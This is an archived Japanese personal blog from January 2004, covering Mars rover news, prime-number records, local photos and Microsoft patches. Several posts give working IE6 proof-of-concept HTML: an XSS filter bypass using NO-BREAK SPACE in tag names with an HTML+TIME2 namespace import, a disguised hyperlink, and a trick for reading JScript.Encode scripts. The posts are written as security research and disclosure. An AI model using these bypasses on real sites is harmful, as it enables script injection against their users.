2004年1月アーカイブ

Opportunity 発進!

| コメント(0)

Spirit に続いて Opportunity も移動を開始。

Opportunity rover a true Marsmobile (Spaceflight Now、1 月 31 日)→@nifty 翻訳

Opportunity on Its Own (NASA JPL MER、1 月 31 日)→@nifty 翻訳

http://www.jpl.nasa.gov/mer2004/rover-images/jan-31-2004/1R128814818-med.jpg …800×800 ピクセル、74KB

素数探索関連

| コメント(0)

わ た し の 素 数 (Mat さん)

素数判定しやすい系列の数に限って言えば数 1000 桁程度の素数も比較的簡単に見つかるので、興味のある人は挑戦してみると面白いかも知れません。私が素因数分解の対象にしている Near-repdigit の仲間にも素数判定しやすい系列がいくつかあるのですが、それらは既に巨大な素数が報告されているので、どうやって判定するかは後で考えることにしてあえて判定しにくい系列から素数候補を探しています。

「血の出る松の跡」

| コメント(0)

東所沢病院と滝の城址公園の間の坂道の途中にあるちょっと怖い石碑。滝の城は豊臣秀吉の軍が北条氏の小田原城を攻めたとき浅野長政によって落とされ、そのとき流された多くの血を吸った松に傷をつけると血のような赤い汁が出たのだとか。

撮影日:きょう。ロケ地:滝の城址公園→ MapionBB

参考

所沢市立柳瀬小学校

滝の城址

さいたまの歴史散歩

滝の城

Mydoom

| コメント(0)

スパムとワームがたくさん届くのはいつものことだけれど、今回はエラーメールの割合がいつもよりも多いのが嫌な感じ。

Mydoom の感染速度は過去最大級、標的となった SCO は犯人逮捕に懸賞金 (impress INTERNET Watch、1 月 28 日)

感染広がる『マイドゥーム』、標的はリナックス著作権問題の SCO (HOTWIRED JAPAN、1 月 28 日)

SCO、『マイドゥーム』の犯人情報に 25 万ドルの謝礼金 (HOTWIRED JAPAN、1 月 28 日)

ネットワーク・セキュリティ・ニュース (篠田さん)

1986 年 1 月 28 日、スペースシャトル・チャレンジャーが打ち上げ直後に爆発し、乗組員 7 人全員が死亡。

2003 年 2 月 1 日、スペースシャトル・コロンビアが大気圏再突入後に空中分解し、乗組員 7 人全員が死亡。

S/2003 J22

| コメント(0)

S/2003 J22 が新たに木星の衛星に加わり、木星の衛星の数が 62 個になりました。現在までに確認されている太陽系の惑星の衛星の数は、地球が 1 個、火星が 2 個、木星が 62 個、土星が 31 個、天王星が 27 個、海王星が 13 個、冥王星が 1 個。合計 137 個。

Scott S. Sheppard

Natural Satellite Discovery Data (NASA JPL SSD、1 月 26 日)

科学主任 Steve Squyres 氏の言葉。Spirit から 1 万 km ほど離れた地点に着陸した Opportunity の周囲には、かつてない重要な結果をもたらすに違いない優れた研究材料がありそうだ。

Mission Status Center (Spaceflight Now、最新情報)→@nifty 翻訳

Opportunity made 'interplanetary hole-in-one' (CNN.com Space、1 月 25 日)→@nifty 翻訳

Meridiani Planum in Color (NASA JPL MER、1 月 25 日)→@nifty 翻訳

http://photojournal.jpl.nasa.gov/jpegMod/PIA05144_modest.jpg …514×646 ピクセル、35KB

http://www.jpl.nasa.gov/mer2004/rover-images/jan-25-2004/Pancam_Sol1_Postcard-med.jpg …636×800 ピクセル、60KB

http://photojournal.jpl.nasa.gov/tiff/PIA05144.tif …2319×2915 ピクセル、20.3MB

Opportunity

| コメント(0)

NASA の火星探査機 Opportunity は予定通り着陸に成功し、着陸地点の周辺を撮影した画像を次々と地球へ送ってきています。

Opportunity: All 77 Raw Images (NASA JPL MER)

Spirit / Opportunity

| コメント(0)

水曜日から続いていた通信の異常はやや回復して Spirit から 128 kilobits/second の通信速度で 73 megabits の電源系の情報が送られてきたものの、いくつかのフレームがランダムなデータで埋め尽くされており復旧にはまだ時間がかかりそうな気配。NASA のもう 1 機の火星探査機 Opportunity は日本時間の明日 25 日 14 時 05 分に予定されている火星着陸へ向けて順調に飛行中。

Mission Status Center (Spaceflight Now、最新情報)→@nifty 翻訳

Mars Exploration Rover Mission Status (NASA JPL Mars Exploration Rover Mission: Press Releases、1 月 23 日)→@nifty 翻訳

XM6 version 1.50

| コメント(0)

PI. さんによる Windows 用 X68000EXPERT エミュレータ XM6 の version 1.50 が公開されました。

PI.Home page (PI. さん)

X68000 エミュレータ XM6

本栖湖から望む富士山

| コメント(0)

頂上付近に少し雲がかかってしまいましたが、空気が澄んでいて絶景でした。ただ、「本栖湖の逆さ富士」を見逃した(ことに後で気付いた)のが心残り。

撮影日:きょう。ロケ地:本栖湖。サイズ:800×600 ピクセル、70KB。

1 台のデジカメで 2 回に分けて撮影したので雲が少し動いてしまいましたが、湖面の奥行きを感じることができると思います。

撮影日:きょう。ロケ地:精進湖。サイズ:960×320 ピクセル、170KB。

精進湖から望む富士山

| コメント(0)

撮影日:きょう。ロケ地:精進湖。サイズ:4000×600 ピクセル、530KB。

Spirit

| コメント(0)

岩石の調査を始めた火星探査ローバー Spirit から送られてくる信号に深刻な異常が発生しており、予定の調査を続行できない状態になっているようです。日本時間の 23 日午前 2 時前に届いたわずかな信号は地球から送られたコマンドが Spirit に届いていることを示していたとのことで、望みを持ちながら原因究明と復旧の努力が続けられています。

Mission Status Center (Spaceflight Now、最新情報)→@nifty 翻訳

Spirit rover suffers 'serious anomaly' (Spaceflight Now、1 月 22 日)→@nifty 翻訳

55...551

| コメント(0)

(5·10n-41)/9 = { 1, 51, 551, 5551, 55551, ... } の系列で n = 12, 13, 609 に次ぐ素数候補を探索中。

JScript.Encode の暗号化はお世辞にも複雑とは言えないのでデコーダを作るのは(法的な問題は別にして技術的には)簡単ですが、符号が短いときはデコーダを用意しなくても適当なイベントに割り当ててイベントの内容を表示させるだけでスクリプトを読むことができます。VBScript.Encode でも同じです。

HTML ファイル

-<body onclick="#@~^HAAAAA==C^+.D`9Wm!:&#127;UYc4GNHRGU1Vk1V#tQoAAA==^#~@"
onload="#@~^HAAAAA==C^+.D`9Wm!:&#127;UYc4GNHRGU1Vk1V#tQoAAA==^#~@"
language="JScript.Encode">
</body>

実験

上の HTML ファイルを表示してみる

アディロンダック

| コメント(0)

最初の研究材料に選ばれて Spirit が向かった火星の岩石の名前。Adirondack はニューヨーク州にある地名だが、もともとネイティブアメリカンの言葉で "They of the great rocks." という意味。

"They of the Great Rocks" (NASA JPL MER、1 月 19 日)→@nifty 翻訳

http://www.jpl.nasa.gov/mer2004/rover-images/jan-19-2004/011904-2.jpg …800×800 ピクセル、200KB

関連

AdirondackNET - Your complete guide to the Adirondack Region of New York - Lake George, Glens Falls, Queensbury, Bolton Landing, Diamond Point, Schroon Lake, warrensburg

刺身と寿司

| コメント(0)

表面がでこぼこで埃っぽいので研究材料に選ばれなかった火星の岩石の名前が Sashimi と Sushi。

Hungry for Rocks (NASA JPL MER、1 月 19 日)→@nifty 翻訳

http://www.jpl.nasa.gov/mer2004/rover-images/jan-19-2004/011904-3.jpg …800×800 ピクセル、150KB

ほころび

| コメント(0)

撮影日:きょう。ロケ地:柳瀬川沿いの遊歩道(東京都清瀬市中里)。

素数発見メモ

| コメント(0)

1 と 7 の間に 6 を 2626 個挟んだ 2628 桁の数 (5·102627+1)/3 は素数ということで確定。near-repdigit でも palindrome でもないところがいまいち面白味に欠けるけど。

素数探索プロジェクト

| コメント(0)

Mat さん から。徳島大学で今月から稼動し始めた分散コンピューティングによる本格的な素数探索プロジェクトがあります。ここでは指数が 2^17 で 100 万桁以上の Generalized Fermat の素数探索が行われています。

素数探索プロジェクト (徳島大学工学部知能情報工学科・森井研究室)

The Top Twenty: Generalized Fermat (Chris K. Caldwell さん)

The Largest Known Primes (Chris K. Caldwell さん)

素因数分解

| コメント(0)

数列 (8·10n-71)/9 = { 1, 81, 881, 8881, 88881, ... } の素因数分解表を n≤150 まで伸ばしました。未分解の数が 18 個残っています。

Factorizations of near-repdigit numbers

その後

| コメント(0)

(8*10^4417-71)/9 の話の続きですが、Chris K. Caldwell さんのデータベースには小さすぎたとはいえ、書いてみるものですね。公開されていないレピュニットの素因数を私が持っている可能性を考えてメールをくださった方から、逆に私が持っていなかった巨大な素因数表の入手方法を教えていただくことができました。

(8*10^4417-71)/9

| コメント(0)

きのう見つけた素数についてですが、もしも 88...881 の系列で 4000 桁を超える素数を探した人が過去にいなければ「とてもマイナーな世界新記録」ということになりますが、マイナーすぎて資料が見つからないので世界新記録かどうかはわかりません。とりあえず The Prime Pages (prime number research, records and resources) (Chris K. Caldwell さん)のデータベースには 88...881 の系列の素数が登録されていないようだったので記念に登録しておきました。しかし、やはり 4417 桁では小さすぎてこのデータベースには場違いな感がなきにしもあらず…。

The Prime Database: (8*10^4417-71)/9 (The Prime Pages)

(8*10^4417-71)/9 is prime (4417 digits)

| コメント(0)

near-repdigit な素数の世界記録は 10 万桁を超えていますからこの記録は微々たるものですが、きょう 4417 桁の near-repdigit な素数を見つけました。8 を 4416 個並べて右端に 1 を付け足した数です。式で書くと (8*104417-71)/9 となります。この数の素数性は自作の pock021.c を使って証明されました。pock021.c で証明された(既知ではなかった)素数の中で最も大きかったものは2003 年 9 月 3 日に証明された 2566 桁の (2*102566-11)/9 でしたが、1800 桁以上更新されました(既知だった素数を含めると 3021 桁の 2*103020-1 が最大でしたがこれも上回りました)。余談ですが、gcd(p(n-1)/2-1,n)=1 を満たす最小の素数 p が 23 というのも自己新記録です。

(8*10^4417-71)/9 is prime (4417 digits)

Spirit 発進!

| コメント(0)

Spirit が 6 つの車輪で火星の大地を走り始めました。

Mission Status Center (Spaceflight Now)→@nifty 翻訳

Spirit Rolls All Six Wheels onto Martian Soil (JPL News、1 月 15 日)→@nifty 翻訳

Six-wheeling on Mars: Rover Spirit drives off lander (Spaceflight Now、1 月 15 日)→@nifty 翻訳

火星探査車: スピリット 地表に下ろす作業にNASA成功 (Mainichi INTERACTIVE、1 月 15 日)

無人探査車「スピリット」、火星に降り立つ (CNN.co.jp サイエンス、1 月 15 日)

NASA rover rolls onto Mars (CNN.com Space、1 月 15 日)→@nifty 翻訳

素因数分解

| コメント(0)

数列 (10n+53)/9 = { 7, 17, 117, 1117, 11117, ... } の素因数分解表を n≤150 まで伸ばしました。未分解の数が 18 個残っています。

Factorizations of near-repdigit numbers

お知らせ

| コメント(0)

STUDIO KAMADA のミラーと X68000 LIBRARY のミラーは tok2.com の大規模メンテナンスのため 16 日まで閲覧できません。

素因数分解

| コメント(0)

数列 5·10n-1 = { 49, 499, 4999, 49999, 499999, ... } の素因数分解表を n≤150 まで伸ばしました。未分解の数が 18 個残っています。

Factorizations of near-repdigit numbers

Microsoft から今年最初の修正プログラムが公開されましたが、MS04-003 までに IE の修正プログラムは含まれていません。Windows XP Home Edition SP1 + IE6 SP1(MS04-003 までのすべての重要な更新を適用済み)の環境で、IE のセキュリティホール(11 月 28 日の日記)、IE6 の危険な不具合(12 月 10 日の日記)、侵入実験(12 月 17 日の日記)のいずれの実験も(対策をとらなければ)以前と同様に動作することを確認しました。引き続き注意が必要です。

MS04-003

| コメント(0)

修正プログラムの内容

Windows の重要な更新

脆弱性の影響

MDAC 機能のバッファ オーバーランにより、コードが実行される

最大深刻度

重要

影響を受けるソフトウェア

Microsoft Data Access Components 2.5

Microsoft Data Access Components 2.6

Microsoft Data Access Components 2.7

Microsoft Data Access Components 2.8

以上を含む Windows 製品

Microsoft Windows XP

Microsoft Windows 2000

Microsoft Windows Millennium

Microsoft Windows Server 2003

Microsoft Windows NT 4.0 Option Pack

Microsoft SQL Server 2000

絵でみるセキュリティ情報

絵でみるセキュリティ情報 MS04-003 (Microsoft Security、1 月 14 日)

詳細情報

MS04-003: MDAC 機能のバッファ オーバーランにより、コードが実行される (832483) (Microsoft TechNet、1 月 14 日)

ダウンロード

WindowsUpdate (Microsoft)

MS04-002

| コメント(0)

修正プログラムの内容

Exchange Server の重要な更新

脆弱性の影響

Exchange Server 2003 の脆弱性により、権限が昇格する

最大深刻度

警告

影響を受けるソフトウェア

Microsoft Exchange Server 2003

絵でみるセキュリティ情報

絵でみるセキュリティ情報 MS04-002 (Microsoft Security、1 月 14 日)

詳細情報

MS04-002: Exchange Server 2003 の脆弱性により、権限が昇格する (832759) (Microsoft TechNet、1 月 14 日)

ダウンロード

WindowsUpdate (Microsoft)

MS04-001

| コメント(0)

修正プログラムの内容

ISA Server の重要な更新

脆弱性の影響

Microsoft Internet Security and Acceleration Server 2000 H.323 フィルタの脆弱性により、リモートでコードが実行される (816458)

最大深刻度

緊急

影響を受けるソフトウェア

Microsoft Internet Security and Acceleration Server 2000

Microsoft Small Business Server 2000 (Microsoft ISA Server 2000 が含まれるため)

Microsoft Small Business Server 2003 (Microsoft ISA Server 2000 が含まれるため)

絵でみるセキュリティ情報

絵でみるセキュリティ情報 MS04-001 (Microsoft Security、1 月 14 日)

詳細情報

MS04-001: Microsoft Internet Security and Acceleration Server 2000 H.323 フィルタの脆弱性により、リモートでコードが実行される (816458) (Microsoft TechNet、1 月 14 日)

ダウンロード

WindowsUpdate (Microsoft)

フラクタル正 8 面体

| コメント(0)

フラクタル正 8 面体の第 6 項です。小さな正 8 面体の数は 46656 個。

ファンタジー職業適性診断

| コメント(0)

hoshikuzu さん から。ファンタジー職業適性診断 の結果は『賢者』でした。賢者というと「役に立ちそうに見えて実はあまり役に立たない」というイメージがあるのですが、まさにその通りであります。あぅー。

戦士レベル 3 天性の才能あり
盗賊レベル -5 あきらめましょう
僧侶レベル 4 天性の才能あり
魔法使いレベル 8 天性の才能あり
占い師「そなたに最も似合う職業は、万能だがひたすら地味な『賢者』じゃ。
戦士と僧侶と魔法使いの特徴を併せ持ち、盗賊的な『インパクト』に欠けるタイプじゃな。
魔法使い的性質が強めなので、『慎重』で『丁寧』だが『寡黙』なところが特徴じゃ。
最初に任務を与えられると綺麗にこなすが、ゼロから何かを築き上げることが苦手なようじゃの。
他人の尻拭い的な役割を押し付けられないように、断るときは断ることをお勧めするぞ。」
(職業メモ) 攻撃魔法も治癒魔法も使いこなせる万能術者。身体能力も高めだが、前線には立たないほうがいい。

ファンタジー職業適性診断 < TRPG が好きっ !.com (相楽さん)

頭の体操の解き方と答え

| コメント(0)

1 月 1 日の頭の体操の虫食い算の解き方と答えです。

解き方

この問題の商は循環部の長さが 25 桁の純循環小数なので、無限等比級数の和を使って分数に直すと次のようになります。

(循環部)*(1/1025 + 1/1050 + 1/1075 +…) = (循環部)/(1025-1)

1025-1 は 25 桁の数ですが、問題の除数は 11 桁しかないので、約分されているものと考えて 1025-1 の約数の中から 11 桁のものを除数の候補として挙げることにします。

掲示板に「ある数表が必要」と書きましたが、1025-1 の約数を求めるために 1025-1 の素因数分解結果が必要になります。1025-1 の素因数分解結果は次の通りです。

1025-1 = 32 * 41 * 271 * 21401 * 25601 * 182521213001

素因数分解結果から 1025-1 の約数は 96 個あることがわかりますが、桁数が 11 桁になるものを探せばよいので全部計算してみる必要はありません。11 桁の約数は次の 2 つだけです。

41 * 21401 * 25601 = 22463367041

3 * 41 * 21401 * 25601 = 67390101123

これで除数の候補が 2 つに絞られました。

ところで、問題の 4~6 行目を見ると、(下 10 桁が 0 である 12 桁の数)-(除数×1 桁で 12 桁の数) の結果が 9 桁になっています。これは (除数×1 桁で 12 桁の数) の上から 3 桁目が 9 であることを意味しています。上の 2 つの除数の候補を 1~9 倍して 12 桁で上から 3 桁目が 9 になるものを探すと、次の 3 通りあることがわかります。

22463367041 * 8 = 179706936328

67390101123 * 4 = 269560404492

67390101123 * 8 = 539120808984

それぞれ (下 10 桁が 0 である 12 桁の数) の上 2 桁が 18、27、54 となりますが、問題の 2~4 行目の (被除数×100)-(除数×1 桁で 11 桁の数) の結果がこれらの 2 桁の数になるためには (除数×1 桁で 11 桁の数) の下 2 桁がそれぞれ 82、73、46 でなければなりません。これを満たす組み合わせは次の 1 通りしかありません。

44926734100 - 22463367041 * 2 = 44926734100 - 44926734082 = 18

これで除数は 22463367041、被除数は 449267341 が最終的な候補として残りました。後は実際に枠に入れてみて合っているかどうか確かめるだけです。

答え

虫食い算の答え

素因数分解

| コメント(0)

数列 3·10n-1 = { 29, 299, 2999, 29999, 299999, ... } の素因数分解表を n≤150 まで伸ばしました。未分解の数が 18 個残っています。

Factorizations of near-repdigit numbers

火星の空

| コメント(0)

Spirit がパノラマカメラで着陸地点の南東の空を撮影した写真が公開されています。写真の左半分は午前中の遅い時刻、右半分は午後の早い時刻(いずれも着陸地点の現地時間)に撮影されたもので、太陽がフレームから遠ざかるにつれて空の色が暗くなってゆく様子がわかります。

Jet Propulsion Laboratory

Hazy Martian Skies

http://www.jpl.nasa.gov/mer2004/rover-images/jan-10-2004/horizon.jpg …800×205 ピクセル、43KB

http://photojournal.jpl.nasa.gov/jpegMod/PIA05037_modest.jpg …1230×271 ピクセル、20KB

http://marsrovers.jpl.nasa.gov/gallery/press/spirit/20040110a/P2217_P2218_Horizon-A8R1.jpg …2938×752 ピクセル、384KB

http://photojournal.jpl.nasa.gov/jpeg/PIA05037.jpg …3416×752 ピクセル、124KB

http://photojournal.jpl.nasa.gov/tiff/PIA05037.tif …3416×752 ピクセル、7.7MB

Spirit は後輪を伸ばして完全に立ち上がり、6 つの車輪で火星の大地を走行する準備が整いつつあります。準備が最短で終わった場合は日曜日の夜にロックを解除、月曜日の夜に 120 度方向転換し、火曜日に北西の方角へ出発するそうです。

NASA's Spirit Stages Martian Stand-Up Performance (JPL News、1 月 10 日)

フォトニックフラクタル

| コメント(0)

最近話題のフォトニックフラクタル。このフラクタル立方体には「電磁波を蓄える」という不思議が性質があるそうな。もしかして「ピラミッドパワー」もその類なのか?

関連

エネルギーの空中採取可能? 電磁波蓄える夢の宝箱開発 (asahi.com サイエンス、1 月 7 日)

Norton AntiVirus

| コメント(0)

最近うちの PC でアプリケーションの起動がもたつくことが多いと思っていたらこんな記事が。

シマンテック、定義ファイル更新により PC が不安定になる不具合 (impress INTERNET Watch、1 月 9 日)

メモ

| コメント(0)

IE6 の細かいバージョンを調べる方法。同じ方法で IE6 以外のコンポーネント(Microsoft VM など)のバージョンも調べることができる。

HTML ファイル

-<body style="behavior:url(#default#clientcaps)" onload="alert(document.body.getComponentVersion('{89820200-ECBD-11CF-8B85-00AA005B4383}','ComponentID'))"></body>

実験

上の HTML ファイルを表示してみる

自動ダウンロードソフトを使用して、きのう 1 日で X68000 LIBRARY 内の HTML ファイル(のロガー)に少なくとも 7000 回以上もアクセスした人がいます。その人は 中部電力のコミュファ (名古屋市内にサービスエリアを展開している ISP)経由で未明に 3110 回アクセスした後、21 時 17 分頃に再び現れて毎秒 1 ファイル以上のペースでアクセスを繰り返していました。22 時 22 分頃までの 1 時間 5 分の間に 3900 回アクセスされたところでログが溢れてしまったので、それ以降に何回アクセスされたのかは不明です。

アクセス数が多くてもそれがすべて本当に必要なアクセスならばよいのですが、そもそも X68000 LIBRARY 内に HTML ファイルはおよそ 600 個しかありません。すなわち、ファイル 1 個あたり平均 11 回以上もアクセスされたことになり、7000 回のうち 6400 回はまったく無駄なアクセスだったことになります。自動ダウンロードソフトを使わないでほしいとまでは言いませんが、重複しているアドレスを省くくらいのことはクライアント側でやってほしいものです。さらに言えば、X68000 LIBRARY のロガーは STUDIO KAMADA と共通(カウンタは別です)なので X68000 LIBRARY とロガーはサーバが異なり、ダウンロードする対象のサーバを適切に制限していれば自動ダウンロードソフトのアクセスがログに記録されることはないはずです。サーバも制限せずにどこまでダウンロードしようとしていたのか疑問です。

HTTP_USER_AGENT は Mozilla/4.0 (compatible; Getweb!/2.83 [I-O DATA Edition]) となっていました。この Getweb!/2.83 [I-O DATA Edition] というソフトがどれほどの性能のものなのか知りませんが(HTTP_USER_AGENT の内容が偽装でないという保証もありませんが)、一般的な注意として自動ダウンロードソフトを使用するときはソフトの性能や設定に細心の注意を払い、サーバに余計な負荷をかけないように気を付けましょう。昔と違って最近のサーバでは 1 人が無茶をしたくらいですぐに他の人に迷惑がかかるということはないと思いますが、「自分 1 人くらいなら…」という自己中心的な考え方の人が大勢いた場合のことを考えるとやはり心配です。

関連

情報提供ありがとうございます。

ホームページ自動ダウンロードソフト「Getweb!」 (web technology Corp.)

I-O 特集記事 index (IO-DATA) … 各種通信関連製品に付属の Getweb! が I-O DATA Edition と思われる

火星の大地(高解像度カラー)

| コメント(0)

Spirit から届いた火星の大地の高解像度カラー写真が公開されました。先日のモノクロ写真ではわからなかった細かい岩石まで鮮明に写っていて圧巻です。

Jet Propulsion Laboratory

First Color Image from Spirit

http://photojournal.jpl.nasa.gov/jpegMod/PIA04995_modest.jpg …550×606 ピクセル、43KB

http://www.jpl.nasa.gov/mer2004/rover-images/jan-06-2004/P2302.jpg …2500×2752 ピクセル、4.0MB

http://photojournal.jpl.nasa.gov/jpeg/PIA04995.jpg …3498×3851 ピクセル、1.1MB

http://photojournal.jpl.nasa.gov/tiff/PIA04995.tif …3498×3851 ピクセル、40.4MB

Martian Horizon

http://www.jpl.nasa.gov/mer2004/rover-images/jan-06-2004/horizon-540-405.jpg …540×405 ピクセル、35KB

http://photojournal.jpl.nasa.gov/jpegMod/PIA05003_modest.jpg …666×550 ピクセル、49KB

http://photojournal.jpl.nasa.gov/jpeg/PIA05003.jpg …1280×960 ピクセル、146KB

http://photojournal.jpl.nasa.gov/tiff/PIA05003.tif …1280×960 ピクセル、3.7MB

Windtail

http://photojournal.jpl.nasa.gov/jpegMod/PIA04996_modest.jpg …666×500 ピクセル、48KB

http://photojournal.jpl.nasa.gov/jpeg/PIA04996.jpg …1280×960 ピクセル、136.2KB

http://www.jpl.nasa.gov/mer2004/rover-images/jan-06-2004/windtails.jpg …1280×960 ピクセル、985KB

http://photojournal.jpl.nasa.gov/tiff/PIA04996.tif …1280×960 ピクセル、3.7MB

Wind-polished rocks

http://photojournal.jpl.nasa.gov/jpegMod/PIA04997_modest.jpg …640×480KB、35KB

http://photojournal.jpl.nasa.gov/jpeg/PIA04997.jpg … …640×480KB、36KB

http://www.jpl.nasa.gov/mer2004/rover-images/jan-06-2004/smooth_rocks.jpg …640×480 ピクセル、254KB

http://photojournal.jpl.nasa.gov/tiff/PIA04997.tif …640×480 ピクセル、923KB

Spirit's Airbags Leave Trail

http://photojournal.jpl.nasa.gov/jpegMod/PIA04998_modest.jpg …640×480 ピクセル、30KB

http://photojournal.jpl.nasa.gov/jpeg/PIA04998.jpg …640×480 ピクセル、31KB

http://www.jpl.nasa.gov/mer2004/rover-images/jan-06-2004/airbag_marks.jpg …640×480 ピクセル、220KB

http://photojournal.jpl.nasa.gov/tiff/PIA04998.tif …640×480 ピクセル、923KB

Spaceflight Now

MISSION STATUS CENTER@nifty 翻訳

FIRST COLOR IMAGE

CLOSE-UP VIEW OF TERRAIN

CLOSE-UP VIEW OF STREAKS IN SOIL

CLOSE-UP OF MARKS FROM AIRBAGS

NASA debuts first color picture from Mars rover (CNN.com、1 月 6 日)→@nifty 翻訳

追加

First color image from Spirit rover thrills scientists (Spaceflight Now、1 月 6 日)→@nifty 翻訳

火星探査機からカラー写真、高解像度に「衝撃と畏怖」 (CNN.co.jp サイエンス、1 月 7 日)

火星探査車: カラー写真を初公開 「土壌は粘着力がある」 (Mainichi INTERACTIVE 国際、1 月 7 日)

火星探査車スピリット、初のカラー写真を撮影 (asahi.com サイエンス、1 月 7 日)

2003 Year-End Google Zeitgeist

| コメント(0)

Zeitgeist=時代思潮。Google の 2003 年のキーワードランキングが各部門それぞれ 10 位まで発表されています。総合 1 位は日本でも話題になっている「britney spears」、日本語の総合 1 位は「ガンダム」、日本語の女性名の 1 位は「小倉 優子」、日本語の男性名の 1 位は「ベッカム」。Google ほどの規模(サンプル数)になるとキーワードのリクエスト数はそれが話題になっている時期かどうかによってなめらかなカーブを描いて増減しそうに思えるのですが、必ずしもそうとは限らず、例えば12 月 22 日のカリフォルニアの地震の直後には「California Earthquake」というキーワードが瞬間的に大量にリクエストされたそうです。納得。

2003 Year-End Google Zeitgeist (Google Press Center)

HTML+TIME2 の代わりに自前の HTC ファイルを使うと、文字数の少ないハイパーリンクの偽物ができます。

HTML ファイル

-<html>
<head>
<xml:namespace prefix="a&#160;href=&quot;blank.htm?">
<?import namespace="a&#160;href=&quot;blank.htm?" implementation="ietest36.htc">
</head>
<body>
<a href="blank.htm?:a">blank.htm</a>
</body>
</html>

HTC ファイル

-<public:component tagname="a" />
<script>
alert(element.document.firstChild.outerHTML);
</script>

実験

上の HTML ファイルを表示してみる

きのう書いた<a href="~"> の偽物の実験を使って、星屑さん が(空白で誤魔化す以前に)HTML+TIME2 だけでクロスサイトスクリプトを許してしまうというダメダメなシステムを発見してしまったそうです。管理者には報告済みとのことなので、そのシステムが早急に修正されることを望みます。

火星の大地

| コメント(0)

Spirit から送られてきた最初の画像が公開されました。低解像度の画像ですが、荒涼とした火星の大地はもちろんのこと、そこにバウンドしながら着地するときに使用したエアバッグを潰してその上に太陽電池パネルを展開した Spirit 自身の元気な姿をとらえた写真はやはり感動的です。高解像度のパノラマ写真は日本時間の明日までには公開されるそうです。

Jet Propulsion Laboratory (NASA)

Spirit Lands on Mars and Sends Postcards (NASA JPL News、1 月 4 日)→ @nifty 翻訳

Spirit Panorama

http://www.jpl.nasa.gov/mer2004/rover-images/jan-04-2004/2NN001EDN00CYL00P1502R000M1.jpg

View From Above Spirit on Mars

http://www.jpl.nasa.gov/mer2004/rover-images/jan-04-2004/send-p150x_pol.jpg

Spirit Front

http://www.jpl.nasa.gov/mer2004/rover-images/jan-04-2004/2F126468064RAD0000P1001R0M1.jpg

Ground

http://www.jpl.nasa.gov/mer2004/rover-images/jan-04-2004/ground.jpg

Behind Spirit

http://www.jpl.nasa.gov/mer2004/rover-images/jan-04-2004/2R126468012DNL0000P1002L0M1.jpg

First images from Spirit (Spaceflight Now、1 月 4 日)

http://spaceflightnow.com/mars/mera/images/firstimage5_full.jpg

Spirit rover bounces to successful landing (Spaceflight Now、1 月 4 日)→@nifty 翻訳

Scientist calls Spirit landing site 'a glorious place' (Spaceflight Now、1 月 4 日)→@nifty 翻訳

NASA rover lands safely on red planet (CNN.com Space、1 月 4 日)→@nifty 翻訳

火星着陸機「スピリット」から火星表面の画像が届く (CNN.co.jp サイエンス、1 月 4 日)

火星探査車: スピリットが着陸に成功、初画像も NASA (Mainichi INTERACTIVE、1 月 4 日)

Spirit 着地成功!

| コメント(0)

NASA の火星探査機 Spirit のローバーが火星の地表から送信を開始したシグナルが予定の時刻に確認されました。

Mission Status Center (Spaceflight Now)→@nifty 翻訳

こんなの。

-<a href="blank.htm?:set id=? targetElement=? attributeName=backgroundImage to=url(javascript:alert(document.firstChild.outerHTML))>">blank.htm</a>

上の例は <a href="~"> の a と href の間が空白(&#32;)ではなく NO-BREAK SPACE(&#160;)で区切られており、"~" の中に怪しげな文字列が書かれています。

Opera 7.23 では NO-BREAK SPACE が空白と同様に扱われるので、上の例は <a> 要素と見なされてハイパーリンクが表示されます。当然、クリックすれば blank.htm が開きます。

IE6 では NO-BREAK SPACE がタグ名の一部と見なされます。そこで、次のようにして「a href="blank.htm?」を HTML+TIME2 の namespace にすると、上の例は <set> 要素と見なされて <set> 要素自身の backgroundImage プロパティに url(javascript:alert(document.firstChild.outerHTML)) を割り当てようとしてスクリプトが実行されてダイアログが表示されます。

HTML ファイル

-<html>
<head>
<xml:namespace prefix="a&#160;href=&quot;blank.htm?">
<?import namespace="a&#160;href=&quot;blank.htm?" implementation="#default#time2">
</head>
<body>
<a href="blank.htm?:set id=? targetElement=? attributeName=backgroundImage to=url(javascript:alert(document.firstChild.outerHTML))>">blank.htm</a>
</body>
</html>

実験

この実験はアクティブスクリプトと ActiveX コントロールの実行とアニメーションの表示が有効になっていなければ動作しません。

上の HTML ファイルを表示してみる

補足

上ではありふれたタグとして <a href="~"> を使いましたが、どのタグのどの属性でも同じことができます。XSS 対策のための構文解析の際に Opera 7.23 のように NO-BREAK SPACE を空白と同様に扱うことにすると(xml:namespace や ?import を確実に排除しなければ)クロスサイトスクリプトを許してしまう可能性があるので要注意です。ZERO WIDTH SPACE(&#x200b;)などでも同様です。

-<a name="blank.htm?:set id=? targetElement=? attributeName=backgroundImage to=url(javascript:alert(document.firstChild.outerHTML))>">
<img alt="blank.htm?:set id=? targetElement=? attributeName=backgroundImage to=url(javascript:alert(document.firstChild.outerHTML))>">

Spirit

| コメント(0)

昨年 6 月と 7 月に打ち上げられた NASA の 2 機の火星探査機のうち、先行している Spirit のローバーが日本時間の明日 4 日午後 1 時 35 分頃に火星に着陸する予定になっています。日本の火星探査機「のぞみ」は機能不全のため火星を後にし、ESA の Mars Express は着陸船 Beagle 2 が消息不明になるなど予定通り進まないミッションが相次いでいますが、本命ともいえる NASA のミッションは予定通り進むことを期待したいです。NASA のもう 1 機の火星探査機 Opportunity のローバーは 1 月 25 日に火星に着陸する予定になっています。

Mars Exploration Rover Mission: Home (NASA JPL)

America's Spirit Is Ready to Rock-n-Roll Martian Style Saturday Night@nifty 翻訳

Mission Status Center (Spaceflight Now)→@nifty 翻訳

Stardust

| コメント(0)

NASA の宇宙探査機 Stardust は彗星 Wild 2 に 240km まで接近し、ダストの収集と Wild 2 の詳細な写真を撮影することに成功しました。

Welcome to Stardust! (NASA JPL)

NASA Spacecraft Makes Great Catch...Heads for Touchdown (1 月 2 日)→@nifty 翻訳

Scientists elated with initial Stardust comet flyby results (Spaceflight Now、1 月 2 日)→@nifty 翻訳

'Stardust' sweeps up space dust, snaps rare comet pics (CNN.com、1 月 2 日)→@nifty 翻訳

Stardust Has Shields Up

| コメント(0)

